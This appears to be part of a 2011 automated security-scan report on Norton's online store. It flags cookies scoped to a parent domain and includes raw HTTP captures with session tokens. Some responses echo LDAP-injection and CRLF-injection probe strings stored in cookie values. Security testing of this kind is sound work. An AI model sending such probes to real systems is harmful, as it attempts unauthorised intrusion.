GET /estore/mf/upgradeRenewal?rdid=2dc9ee7a-735b-48ad-9d3a-5af89444b3ae1315603880199 HTTP/1.1 Host: buy.norton.com Proxy-Connection: keep-alive Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_pers=%20s_nr%3D1315621900063-New%7C1336357900063%3B%20event69%3Devent69%7C1336357900064%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20s_sv_sid%3D760290967935%3B; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/2; s_sv_112_s1=1@16@a//1315621902268; JSESSIONID=LyytTqFG2snPQBSzMGKlyR2Ll6W2nTt9yvvmMtQHvQcdVXB18rCT!-50551110; FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16; BIGipServerbuy1_prd_SSL=4046749583.16671.0000; symSessionGuid=359A5BC1-187B-E37B-9025-A486DEF7EF50; sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; AKNORT=0; mbox=check#true#1315621970|session#1315621887128-280442#1315623770|PC#1315621887128-280442.19#1316831510|profile#+_COUNTRY-US+_LANGUAGE-en+_TRAFFIC_SOURCE-trf_id%3Asymcom+_PGM_TYPE-UNKNOWN+_SUBCHANNEL-Online%20%281st%29+_ORIG_SUB-Online%20%281st%29#1380421910; s_eVar63=%5B%5B'store%253Atrf_id%253Asymcom'%2C'1315621909811'%5D%5D; s_eVar65=%5B%5B'store%253Aonline%2520%25281st%2529'%2C'1315621909812'%5D%5D; s_cc=true; s_nr=1315621909816-New; event69=event69; s_eVar70=%5B%5B'23440%253A0%253A0%252C'%2C'1315621909824'%5D%5D; s_sq=%5B%5BB%5D%5D; COUNTRY=US; LANGUAGE=EN; PROGRAMID_CREATED_DATE=09-09-2011; PROGRAMID=; PROGRAM_TYPE=UNKNOWN; LASTTIME_CV_DATE=Sep-09-2011 14:31:20; TrafficSourceCookieName=trf_id:symcom; OriginalSubChannelCookieName=Online (1st); CurrentSubChannelCookieName=Online (1st)
Response
HTTP/1.1 200 OK Cache-Control: no-cache, max-age=0, must-revalidate Cache-Control: no-cache="set-cookie" Date: Fri, 09 Sep 2011 21:31:22 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8Set-Cookie: symSessionGuid=359A5BC1-187B-E37B-9025-A486DEF7EF50; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:22 GMT; path=/ Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:22 GMT; path=/ Content-Language: en-US X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding Content-Length: 58568 Connection: Keep-Alive <!DOCTYPE html> <!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]--> <!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]--> <!--[if IE 8 ]> <html class="no-js ie8...[SNIP]...
9.12. http://buy.norton.com/estore/productsBundleDetailsMoreInfo/parentCartId/0/slotNo/3/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/72ADB489-65DA-37DC-1C0C-68E27DE2B096/priceGroupId/IRC_Bundle_Upgrade_PL/
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://buy.norton.com
Path:
/estore/productsBundleDetailsMoreInfo/parentCartId/0/slotNo/3/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/72ADB489-65DA-37DC-1C0C-68E27DE2B096/priceGroupId/IRC_Bundle_Upgrade_PL/
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:symSessionGuid=6096FB79-2899-3CBF-0291-6529FB9376B7; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:20 GMT; path=/ sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:20 GMT; path=/ The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /estore/productsBundleDetailsMoreInfo/parentCartId/0/slotNo/3/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/72ADB489-65DA-37DC-1C0C-68E27DE2B096/priceGroupId/IRC_Bundle_Upgrade_PL/ HTTP/1.1 Host: buy.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache, max-age=0, must-revalidate Cache-Control: no-cache="set-cookie" Connection: close Date: Fri, 09 Sep 2011 21:38:20 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8Set-Cookie: symSessionGuid=6096FB79-2899-3CBF-0291-6529FB9376B7; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:20 GMT; path=/ Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:20 GMT; path=/ Content-Language: en-US X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding Content-Length: 41047 <!DOCTYPE html> <!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]--> <!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]--> <!--[if IE 8 ]> <html class="no-js ie8...[SNIP]...
9.13. http://buy.norton.com/estore/productsDetailsMoreInfo/parentCartId/0/slotNo/2/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/21147701/priceGroupId/IRC_Upgrade_PL/
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://buy.norton.com
Path:
/estore/productsDetailsMoreInfo/parentCartId/0/slotNo/2/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/21147701/priceGroupId/IRC_Upgrade_PL/
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:symSessionGuid=6BFF5F18-81A0-7426-AE16-067CCC63D696; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:17 GMT; path=/ sessionExpiration=CH#de#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:17 GMT; path=/ The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /estore/productsDetailsMoreInfo/parentCartId/0/slotNo/2/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/21147701/priceGroupId/IRC_Upgrade_PL/ HTTP/1.1 Host: buy.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache, max-age=0, must-revalidate Cache-Control: no-cache="set-cookie" Connection: close Date: Fri, 09 Sep 2011 21:38:17 GMT Pragma: no-cache Location: http://buy.norton.com/estore/mf/errorProductNotFound Content-Type: text/html; charset=UTF-8Set-Cookie: symSessionGuid=6BFF5F18-81A0-7426-AE16-067CCC63D696; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:17 GMT; path=/ Set-Cookie: sessionExpiration=CH#de#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:17 GMT; path=/ Content-Language: de-CH X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding Content-Length: 299 <html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="http://buy.norton.com/estore/mf/er...[SNIP]...
9.14. http://mbox3.offermatica.com/m2/verisign/mbox/standard
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://mbox3.offermatica.com
Path:
/m2/verisign/mbox/standard
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:mboxSession=1315621455064-973488; Domain=offermatica.com; Expires=Fri, 09-Sep-2011 21:56:52 GMT; Path=/m2/verisign The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /m2/verisign/mbox/standard?mboxHost=www.verisign.com&mboxSession=1315621455064-973488&mboxPC=1315621455064-973488.19&mboxPage=1315621580604-481541&mboxXDomain=enabled&mboxCount=1&protocol=http%3A&serverDomain=www.verisign.com&referrer=none&mbox=VRSN_TS_Main&mboxId=0&mboxURL=http%3A//www.verisign.com/trust-seal/index.html%3Ftid%3Dgnps&mboxReferrer=&mboxVersion=31 HTTP/1.1 Host: mbox3.offermatica.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/trust-seal/index.html?tid=gnps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mboxPC=1315621455064-973488.19
Response
HTTP/1.1 302 Moved Temporarily Server: Test & Target P3P: CP="NOI DSP CURa OUR STP COM" Date: Fri, 09 Sep 2011 21:25:51 GMT Location: http://mbox3.offermatica.com/m2/verisign/mbox/standard?mboxHost=www.verisign.com&mboxSession=1315621455064-973488&mboxPC=1315621455064-973488.19&mboxPage=1315621580604-481541&mboxXDomain=enabled&mboxCount=1&protocol=http%3A&serverDomain=www.verisign.com&referrer=none&mbox=VRSN_TS_Main&mboxId=0&mboxURL=http%3A//www.verisign.com/trust-seal/index.html%3Ftid%3Dgnps&mboxReferrer=&mboxVersion=31&mboxXDomainCheck=trueSet-Cookie: mboxSession=1315621455064-973488; Domain=offermatica.com; Expires=Fri, 09-Sep-2011 21:56:52 GMT; Path=/m2/verisign Content-Length: 0
9.15. http://buy.norton.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://buy.norton.com
Path:
/
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/ PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/ LASTTIME_CV_DATE=Sep-09-2011 14:31:16; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/ TrafficSourceCookieName=trf_id:symcom; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/ OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/ CurrentSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /?trf_id=symcom&inid=us_hho_errorpage_to_store HTTP/1.1 Host: buy.norton.com Proxy-Connection: keep-alive Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mbox=check#true#1315621948|session#1315621887128-280442#1315623748|PC#1315621887128-280442.19#1316831490; s_pers=%20s_nr%3D1315621900063-New%7C1336357900063%3B%20event69%3Devent69%7C1336357900064%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20s_sv_sid%3D760290967935%3B; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/2; s_sv_112_s1=1@16@a//1315621902268
Response
HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache="set-cookie" Date: Fri, 09 Sep 2011 21:31:16 GMT Location: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=f7d3c8fa-e003-4390-a682-049bba2b3c7d1315603876608 Set-Cookie: COUNTRY=US; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: LANGUAGE=en; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAMID=; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:31:16; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: COUNTRY=US; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/ Set-Cookie: LANGUAGE=en; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/ Set-Cookie: PROGRAMID=; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/ Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:31:16; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/ Set-Cookie: TrafficSourceCookieName=trf_id:symcom; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/ Set-Cookie: OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/ Set-Cookie: CurrentSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:16 GMT; path=/ X-Powered-By: Servlet/2.5 JSP/2.1 Content-Length: 413 <html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="http://buy.norton.com/estore/mf/la...[SNIP]...
9.16. http://buy.norton.com/ps
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://buy.norton.com
Path:
/ps
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/ PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/ LASTTIME_CV_DATE=Sep-09-2011 14:37:23; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/ TrafficSourceCookieName=other; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/ OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/ CurrentSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ps HTTP/1.1 Host: buy.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache="set-cookie" Connection: close Date: Fri, 09 Sep 2011 21:37:23 GMT Location: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=18a29e71-5447-4147-9046-865f8a1fce521315604243554 Set-Cookie: FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16b8014%250d%250ae956c741f6e; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: COUNTRY=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: LANGUAGE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAMID_CREATED_DATE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAMID=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAM_TYPE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:31:2053e95%250d%250ad87014f842f; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: COUNTRY=US; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/ Set-Cookie: LANGUAGE=en; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/ Set-Cookie: PROGRAMID=; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/ Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:37:23; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/ Set-Cookie: TrafficSourceCookieName=other; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/ Set-Cookie: OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/ Set-Cookie: CurrentSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/ X-Powered-By: Servlet/2.5 JSP/2.1 Content-Length: 413 <html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="http://buy.norton.com/estore/mf/la...[SNIP]...
9.17. http://buy.norton.com/special-promotions
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://buy.norton.com
Path:
/special-promotions
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/ PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/ LASTTIME_CV_DATE=Sep-09-2011 14:37:25; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/ TrafficSourceCookieName=other; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/ OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/ CurrentSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /special-promotions HTTP/1.1 Host: buy.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache="set-cookie" Connection: close Date: Fri, 09 Sep 2011 21:37:25 GMT Location: http://buy.norton.com/estore/mf/landingPromotion?rdid=4d1e0611-4d59-4d29-9f22-ad1cbf72a98d1315604245447 Set-Cookie: FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16b8014%250d%250ae956c741f6e; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: COUNTRY=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: LANGUAGE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAMID_CREATED_DATE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAMID=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAM_TYPE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:31:2053e95%250d%250ad87014f842f; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: COUNTRY=US; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/ Set-Cookie: LANGUAGE=en; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/ Set-Cookie: PROGRAMID=; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/ Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:37:25; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/ Set-Cookie: TrafficSourceCookieName=other; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/ Set-Cookie: OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/ Set-Cookie: CurrentSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/ X-Powered-By: Servlet/2.5 JSP/2.1 Content-Length: 401 <html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="http://buy.norton.com/estore/mf/la...[SNIP]...
9.18. http://buy.norton.com/support
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://buy.norton.com
Path:
/support
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:COUNTRY=*)!(sn=*)!(sn=*; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ LANGUAGE=*)!(sn=*)!(sn=*; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ LASTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ TrafficSourceCookieName=other; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ CurrentSubChannelCookieName=Unknown; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /support HTTP/1.1 Host: buy.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache="set-cookie" Connection: close Date: Fri, 09 Sep 2011 21:38:21 GMT Location: http://www.norton.com/onlinehelp Set-Cookie: FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16b8014%250d%250ae956c741f6e; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: COUNTRY=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: LANGUAGE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAMID_CREATED_DATE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAMID=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAM_TYPE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:31:2053e95%250d%250ad87014f842f; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMTSet-Cookie: COUNTRY=*)!(sn=*)!(sn=*; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ Set-Cookie: LANGUAGE=*)!(sn=*)!(sn=*; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ Set-Cookie: PROGRAMID=; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ Set-Cookie: TrafficSourceCookieName=other; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ Set-Cookie: OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ Set-Cookie: CurrentSubChannelCookieName=Unknown; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ X-Powered-By: Servlet/2.5 JSP/2.1 Content-Length: 259 <html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="http://www.norton.com/onlinehelp">...[SNIP]...
9.19. http://buy.norton.com/upgrades-renewals
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://buy.norton.com
Path:
/upgrades-renewals
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/ PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/ LASTTIME_CV_DATE=Sep-09-2011 14:31:20; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/ TrafficSourceCookieName=trf_id:symcom; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/ OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/ CurrentSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /upgrades-renewals?ctry=US&lang=EN&trf_id=symcom&inid=us_hho_errorpage_to_store HTTP/1.1 Host: buy.norton.com Proxy-Connection: keep-alive Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_pers=%20s_nr%3D1315621900063-New%7C1336357900063%3B%20event69%3Devent69%7C1336357900064%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20s_sv_sid%3D760290967935%3B; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/2; s_sv_112_s1=1@16@a//1315621902268; JSESSIONID=LyytTqFG2snPQBSzMGKlyR2Ll6W2nTt9yvvmMtQHvQcdVXB18rCT!-50551110; FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16; BIGipServerbuy1_prd_SSL=4046749583.16671.0000; COUNTRY=US; LANGUAGE=en; PROGRAMID_CREATED_DATE=09-09-2011; PROGRAMID=; PROGRAM_TYPE=UNKNOWN; LASTTIME_CV_DATE=Sep-09-2011 14:31:18; TrafficSourceCookieName=trf_id:symcom; OriginalSubChannelCookieName=Online (1st); CurrentSubChannelCookieName=Online (1st); 